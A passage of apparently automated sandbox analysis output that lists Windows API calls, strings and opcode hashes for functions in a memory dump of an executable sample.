                                                                                                                        • Opcode Fuzzy Hash: b352ebe8a52dbe7d922c4e8565eff9e28afe063549b20609805b3c440d521fbe
                                                                                                                        • Instruction Fuzzy Hash: 45115931B04741ABEA10AF288C42B6BBB64FFC5754F104A2CF9E0971C1EBA0650486C1
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,?,?,?,0085D5AD,?,?,?), ref: 0089E45D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: DirectoryExists$file_util_win.cc
                                                                                                                        • API String ID: 3188754299-2619260668
                                                                                                                        • Opcode ID: e2f37edc10478e69bae21f963d52b7743de0c2b5aec3eab393c5c9008ec4be5d
                                                                                                                        • Instruction ID: 66683047e0ab6f543b06050d2f7039d068e3bdac42c5619f175270bcac3546ff
                                                                                                                        • Opcode Fuzzy Hash: e2f37edc10478e69bae21f963d52b7743de0c2b5aec3eab393c5c9008ec4be5d
                                                                                                                        • Instruction Fuzzy Hash: 4901F972B107456BE7106B388C8665EB764FFCA774F100B1DF9E593282FBA0655482C1
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 0089E2CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: PathExists$file_util_win.cc
                                                                                                                        • API String ID: 3188754299-4095027001
                                                                                                                        • Opcode ID: 13b5aa07b37745b89ec62ec7460ff997fcc1096d6b2984538a6c18498ce28a51
                                                                                                                        • Instruction ID: d5edacbe07e05fdb5bf42dc091426c3f9114104792ad648fc5075262a2738e31
                                                                                                                        • Opcode Fuzzy Hash: 13b5aa07b37745b89ec62ec7460ff997fcc1096d6b2984538a6c18498ce28a51
                                                                                                                        • Instruction Fuzzy Hash: 26016432A103456BD710AB388C82A6FB768FFCA730F100B1DF8E2935C1FBA0A54082C1
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionEx.KERNEL32(009648F4,00000000,00000000), ref: 00832C64
                                                                                                                        • GetLastError.KERNEL32 ref: 00832C87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalErrorInitializeLastSection
                                                                                                                        • String ID: MZx
                                                                                                                        • API String ID: 3413597225-2575928145
                                                                                                                        • Opcode ID: d1113f74d4fba9ee5d6236a845aef2d59889dbd0fe460b91034755b27d05cc9f
                                                                                                                        • Instruction ID: 75603bb915425724195c4e381c91635431c6980ecf31f651851578293324620b
                                                                                                                        • Opcode Fuzzy Hash: d1113f74d4fba9ee5d6236a845aef2d59889dbd0fe460b91034755b27d05cc9f
                                                                                                                        • Instruction Fuzzy Hash: 79F0B4B496C3854ED340DFB6BC0462636E8FBE5B45F54422EE804D7121E7F050C4BB51
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 008C867E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 008C868A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetHandleVerifier
                                                                                                                        • API String ID: 1646373207-1090674830
                                                                                                                        • Opcode ID: 382a18d6ceae63ead9f4be9b5252d5afd5bd2a8f67428f6630d4b61b1115b147
                                                                                                                        • Instruction ID: 85beee2b3e70d1a86845735aa2f43dafee76bad41b57f598f98643ef407decfb
                                                                                                                        • Opcode Fuzzy Hash: 382a18d6ceae63ead9f4be9b5252d5afd5bd2a8f67428f6630d4b61b1115b147
                                                                                                                        • Instruction Fuzzy Hash: C5D017706A8304EBEE006B669D0DF32326CE71074AF404418F809D1090CF74C840AA20
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000002,?,00941D0E,00000002,GetInfoFromResources,0000016F), ref: 008584CA
                                                                                                                        • FindResourceW.KERNEL32(00000000,00000002,BIN,?,00941D0E,00000002,GetInfoFromResources,0000016F), ref: 008584D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                        • String ID: BIN
                                                                                                                        • API String ID: 3537982541-1015027815
                                                                                                                        • Opcode ID: b9d0b18dcd3e7804b2e6f93702c7886fa48bdb255e94d3fa891dc19bd5981c41
                                                                                                                        • Instruction ID: cdb9404c1af79640b9d46b01209488ca201e093bf7f7d56c45002c551e10a41f
                                                                                                                        • Opcode Fuzzy Hash: b9d0b18dcd3e7804b2e6f93702c7886fa48bdb255e94d3fa891dc19bd5981c41
                                                                                                                        • Instruction Fuzzy Hash: 41C0122226532477C6003BE7EC0FFDB3A5C9B05A67F008011FA0CD1190D7A0945057E0
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,008CC615,?,?,?), ref: 008CC694
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 008CC6C9
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,008CC615,?,?,?), ref: 008CC6DC
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 008CC715
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452528299-0
                                                                                                                        • Opcode ID: 61f1b2eb0634585ddcc17c80677a912628d559afa381d42d3421625459696242
                                                                                                                        • Instruction ID: c6b6a0313cd1b0b4e9f5f814bffb060eeae713d204efbc4aca2315daa07b8426
                                                                                                                        • Opcode Fuzzy Hash: 61f1b2eb0634585ddcc17c80677a912628d559afa381d42d3421625459696242
                                                                                                                        • Instruction Fuzzy Hash: 0B3133B11006048FCB24EF29D98AB5AB7E6FB58324F24882DE59ED7611DB31F841CB52